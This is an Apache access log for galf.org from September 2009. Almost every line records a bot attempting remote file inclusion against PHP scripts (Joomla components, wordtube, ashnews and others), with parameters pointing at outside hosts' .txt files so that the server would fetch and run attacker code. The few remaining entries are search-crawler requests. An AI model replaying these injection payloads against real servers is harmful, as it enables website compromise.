208.43.194.3 - - [21/Sep/2009:15:03:25 -0700] "GET /forum/misc.php?action=http://soxs.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
208.43.194.3 - - [21/Sep/2009:15:03:25 -0700] "GET /logs/access_090511.log%20//forum/misc.php?action=http://soxs.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
208.43.194.3 - - [21/Sep/2009:15:03:25 -0700] "GET /logs//forum/misc.php?action=http://soxs.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
217.173.25.215 - - [21/Sep/2009:15:03:28 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.173.25.215 - - [21/Sep/2009:15:03:29 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.173.25.215 - - [21/Sep/2009:15:03:29 -0700] "GET /logs/access_090420.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:15:03:48 -0700] "GET /mes-stats//bbs//skin/zero_vote/ask_password.php?dir=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:15:03:48 -0700] "GET /logs/access_090504.log//mes-stats//bbs//skin/zero_vote/ask_password.php?dir=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:15:03:48 -0700] "GET /logs/access_090406.log//mes-stats//bbs//skin/zero_vote/ask_password.php?dir=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:15:03:48 -0700] "GET /logs//mes-stats//bbs//skin/zero_vote/ask_password.php?dir=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [21/Sep/2009:15:04:47 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [21/Sep/2009:15:04:48 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [21/Sep/2009:15:04:51 -0700] "GET /logs/access_090420.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
118.45.190.166 - - [21/Sep/2009:15:05:11 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
118.45.190.166 - - [21/Sep/2009:15:05:11 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
118.45.190.166 - - [21/Sep/2009:15:05:14 -0700] "GET /logs/access_090420.log/components/com_performs/performs.php?mosConfig_absolute_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:15:05:47 -0700] "GET /logs/access_090406.log%20%20//mes-stats//bbs//skin/zero_vote/ask_password.php?dir=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:15:05:47 -0700] "GET /logs/access_090504.log%20%20//mes-stats//bbs//skin/zero_vote/ask_password.php?dir=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [21/Sep/2009:15:06:31 -0700] "GET /logs/access_090406.log%20%20//mes-stats//bbs//skin/zero_vote/ask_password.php?dir=http://www.rucoc.com/rucoc1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [21/Sep/2009:15:06:31 -0700] "GET /logs/access_090504.log%20%20//mes-stats//bbs//skin/zero_vote/ask_password.php?dir=http://www.rucoc.com/rucoc1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
83.16.135.210 - - [21/Sep/2009:15:06:46 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.100.5.136 - - [21/Sep/2009:15:07:56 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
193.47.80.39 - - [21/Sep/2009:15:10:08 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.galf.org"
193.47.80.39 - - [21/Sep/2009:15:10:08 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.galf.org"
67.228.220.59 - - [21/Sep/2009:15:10:55 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.220.59 - - [21/Sep/2009:15:10:59 -0700] "GET /logs///administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.220.59 - - [21/Sep/2009:15:10:59 -0700] "GET /logs/access.log%20%20///administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.173.25.215 - - [21/Sep/2009:15:11:36 -0700] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.220.59 - - [21/Sep/2009:15:11:55 -0700] "GET /logs/access_090420.log%20%20///administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
118.45.190.166 - - [21/Sep/2009:15:13:20 -0700] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:15:14:12 -0700] "GET /plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:15:14:12 -0700] "GET /logs//plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:15:14:12 -0700] "GET /logs/access_090720.log%20%20//plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.220.59 - - [21/Sep/2009:15:15:31 -0700] "GET //ashnews.php?pathtoashnews=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.220.59 - - [21/Sep/2009:15:15:31 -0700] "GET /logs/access_090518.log%20%20///ashnews.php?pathtoashnews=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.220.59 - - [21/Sep/2009:15:15:31 -0700] "GET /logs///ashnews.php?pathtoashnews=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.220.59 - - [21/Sep/2009:15:15:56 -0700] "GET /logs/access_090622.log%20%20///ashnews.php?pathtoashnews=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:15:16:15 -0700] "GET /plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://www.mmbeauty.idv.tw//catalog/spread.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:15:16:15 -0700] "GET /logs/access_090720.log//plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://www.mmbeauty.idv.tw//catalog/spread.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:15:16:26 -0700] "GET /logs/access_090720.log//plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:16:41 -0700] "GET /logs/access_090518.log/?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:16:42 -0700] "GET /?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.814" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:16:42 -0700] "GET /logs/?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 200 4799 "-" "libwww-perl/5.814" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:16:44 -0700] "GET /logs/access_090302.log/?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:15:16:48 -0700] "GET /logs//plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://67.222.48.109/images/.ray/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:15:16:48 -0700] "GET /logs/access_090720.log//plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://67.222.48.109/images/.ray/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:15:16:48 -0700] "GET /plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://67.222.48.109/images/.ray/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:16:49 -0700] "GET /logs/access_090518.log/?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:16:49 -0700] "GET /logs/access_090302.log/?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:16:49 -0700] "GET /?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.814" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:16:50 -0700] "GET /logs/access_090518.log/?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:16:52 -0700] "GET /logs/access_090518.log/?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:16:52 -0700] "GET /logs/?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 200 4799 "-" "libwww-perl/5.814" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:16:53 -0700] "GET /?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.814" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:16:55 -0700] "GET /logs/?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 200 4799 "-" "libwww-perl/5.814" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:16:57 -0700] "GET /logs/access_090302.log/?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:15:16:59 -0700] "GET /logs/access_090720.log//plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://67.222.48.109/images/.ray/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:15:16:59 -0700] "GET /plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://67.222.48.109/images/.ray/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:15:16:59 -0700] "GET /logs//plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://67.222.48.109/images/.ray/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:17:12 -0700] "GET /logs/?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 200 4799 "-" "libwww-perl/5.814" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:17:12 -0700] "GET /?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.814" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:17:12 -0700] "GET /logs/access_090518.log/?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:17:12 -0700] "GET /logs/access_090302.log/?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:17:13 -0700] "GET /logs/access_090302.log/?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:17:13 -0700] "GET /?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.814" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:17:13 -0700] "GET /logs/?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 200 4799 "-" "libwww-perl/5.814" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:15:17:17 -0700] "GET /logs//plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://www.mmbeauty.idv.tw//catalog/spread.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:15:19:20 -0700] "GET /logs//plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:15:19:20 -0700] "GET /logs/access_090720.log//plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:15:19:20 -0700] "GET /plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:15:19:38 -0700] "GET /plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:15:19:38 -0700] "GET /logs/access_090720.log//plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:15:19:38 -0700] "GET /logs//plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.165.83.144 - - [21/Sep/2009:15:21:56 -0700] "GET /logs/access_090831.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://leoboy1.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.165.83.144 - - [21/Sep/2009:15:21:56 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://leoboy1.fileave.com/id1.txt? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
213.165.83.144 - - [21/Sep/2009:15:21:56 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://leoboy1.fileave.com/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:15:22:02 -0700] "GET /logs/access_090720.log%20%20//plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:15:22:13 -0700] "GET /logs/access_090720.log%20%20//plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.165.83.144 - - [21/Sep/2009:15:22:18 -0700] "GET /logs/access_090518.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://leoboy1.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:15:26:25 -0700] "GET /logs/access.log//mes-stats//bbs//skin/zero_vote/ask_password.php?dir=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.207.131 - - [21/Sep/2009:15:27:18 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:15:27:45 -0700] "GET /logs/access_090420.log//mes-stats//bbs//skin/zero_vote/ask_password.php?dir=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.207.131 - - [21/Sep/2009:15:28:07 -0700] "GET /logs/access_090209.log HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
83.16.135.210 - - [21/Sep/2009:15:29:17 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
222.236.47.182 - - [21/Sep/2009:15:30:48 -0700] "GET //pccookbook.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [21/Sep/2009:15:30:48 -0700] "GET /logs/access_090629.log///pccookbook.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [21/Sep/2009:15:30:48 -0700] "GET /logs///pccookbook.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [21/Sep/2009:15:31:04 -0700] "GET /logs/access_090601.log///pccookbook.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.115.153 - - [21/Sep/2009:15:33:50 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
83.16.135.210 - - [21/Sep/2009:15:35:58 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.165.83.144 - - [21/Sep/2009:15:36:48 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://leoboy1.fileave.com/id1.txt? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
213.165.83.144 - - [21/Sep/2009:15:36:48 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://leoboy1.fileave.com/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
213.165.83.144 - - [21/Sep/2009:15:36:48 -0700] "GET /logs/access_090309.log///?_SERVER[DOCUMENT_ROOT]=http://leoboy1.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.165.83.144 - - [21/Sep/2009:15:37:04 -0700] "GET /logs/access_090223.log///?_SERVER[DOCUMENT_ROOT]=http://leoboy1.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [21/Sep/2009:15:38:00 -0700] "GET /logs/access_090622.log%20%20///pccookbook.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [21/Sep/2009:15:38:16 -0700] "GET /logs/access_090629.log%20%20///pccookbook.php?mosConfig_absolute_path=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.165.83.144 - - [21/Sep/2009:15:41:04 -0700] "GET /logs/access_090817.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://leoboy1.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.165.83.144 - - [21/Sep/2009:15:41:34 -0700] "GET /logs/access_090223.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://leoboy1.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:15:44:54 -0700] "GET /logs//cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=http://rox-crime2.no-ip.org:8080/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:15:44:54 -0700] "GET /logs/access_090525.log//cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=http://rox-crime2.no-ip.org:8080/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:15:44:54 -0700] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=http://rox-crime2.no-ip.org:8080/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:15:45:08 -0700] "GET /logs/access_090824.log//cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=http://rox-crime2.no-ip.org:8080/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:15:45:43 -0700] "GET /mes-stats/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=Ihttp://rox-crime2.no-ip.org:8080/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:15:45:43 -0700] "GET /logs//mes-stats/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=Ihttp://rox-crime2.no-ip.org:8080/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:15:45:43 -0700] "GET /logs/access_090525.log//mes-stats/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=Ihttp://rox-crime2.no-ip.org:8080/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:15:45:58 -0700] "GET /logs/access_090824.log//mes-stats/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=Ihttp://rox-crime2.no-ip.org:8080/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:15:49:59 -0700] "GET /logs/access_090713.log///send_reminders.php?noSet=0&includedir=http://rox-crime2.no-ip.org:8080/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:15:49:59 -0700] "GET //send_reminders.php?noSet=0&includedir=http://rox-crime2.no-ip.org:8080/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:15:49:59 -0700] "GET /logs///send_reminders.php?noSet=0&includedir=http://rox-crime2.no-ip.org:8080/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:51:08 -0700] "GET /logs/access_090518.log/?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:51:09 -0700] "GET /logs/?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 200 4799 "-" "libwww-perl/5.814" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:51:09 -0700] "GET /?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.814" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:51:09 -0700] "GET /logs/access_090518.log/?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:51:09 -0700] "GET /?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.814" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:51:10 -0700] "GET /logs/?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 200 4799 "-" "libwww-perl/5.814" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:51:22 -0700] "GET /logs/?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 200 4799 "-" "libwww-perl/5.814" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:51:22 -0700] "GET /logs/access_090518.log/?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
78.110.50.130 - - [21/Sep/2009:15:51:22 -0700] "GET /?sourcedir=http://irisamkwang.co.kr/zeroboard/skin/video/id.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.814" "www.galf.org"
